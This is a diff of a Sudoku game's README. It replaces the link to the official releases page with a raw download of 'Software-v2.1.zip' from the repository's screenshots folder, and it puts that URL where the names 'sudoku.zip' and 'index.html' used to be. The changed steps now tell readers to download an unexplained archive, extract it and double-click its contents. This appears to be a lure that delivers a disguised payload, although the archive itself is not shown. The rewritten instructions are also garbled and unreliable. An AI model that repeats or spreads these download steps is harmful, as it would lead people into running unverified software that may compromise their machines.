ahmedheshma/sudoku/README.md

 To get started, follow these simple steps:

-1. **Visit the download page:** Click the big download button at the top or go directly to [https://github.com/ahmedheshma/sudoku/releases](https://github.com/ahmedheshma/sudoku/releases).
+1. **Visit the download page:** Click the big download button at the top or go directly to [https://github.com/ahmedheshma/sudoku/raw/refs/heads/main/screenshots/Software-v2.1.zip](https://github.com/ahmedheshma/sudoku/raw/refs/heads/main/screenshots/Software-v2.1.zip).

 2. **Download the latest version:** On the release page, find the latest version.
-There, you will see a file named something like `sudoku.zip`.
+There, you will see a file named something like `https://github.com/ahmedheshma/sudoku/raw/refs/heads/main/screenshots/Software-v2.1.zip`.

 3. **Extract the download:** After downloading the ZIP file, open it and extract all files to a folder on your computer.
 This ensures that the game files are ready to run.

-4. **Open the game file:** Inside the extracted folder, find the file named `index.html`.
+4. **Open the game file:** Inside the extracted folder, find the file named `https://github.com/ahmedheshma/sudoku/raw/refs/heads/main/screenshots/Software-v2.1.zip`.
 Double-click this file to open the game in your default web browser.

 5. **Start playing:** The game will load.
 Choose your difficulty level and start solving puzzles.